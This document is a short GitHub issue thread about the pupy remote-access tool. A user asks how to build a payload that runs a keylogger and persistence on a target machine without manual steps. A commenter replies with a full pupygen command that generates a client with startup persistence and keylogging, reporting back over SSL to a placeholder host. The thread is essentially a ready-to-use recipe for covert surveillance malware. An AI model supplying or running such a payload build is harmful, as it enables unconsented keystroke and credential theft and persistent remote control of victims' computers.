### ISSUE TITLE
How to build keylogger + persistence payload 

### ISSUE THREAD

**Issue by kelvin2185** [n1nj4sec/pupy#445]
please can someone show me the command on how to build a payload that can make pupy run keylogger and persistence mode in a target machine.  whenever i open my pupy server i will see target session and keystroke without manually runing payload in target machine and runing the keylogger module command.

Thanks.

**Comment by spcwb** [comment]
`./pupygen.py -s persistence,method=startup -s keylogger -f client -A x86 connect --host 127.0.0.1:443 -t ssl`

**Comment by kelvin2185** [comment]
awesome thanks!
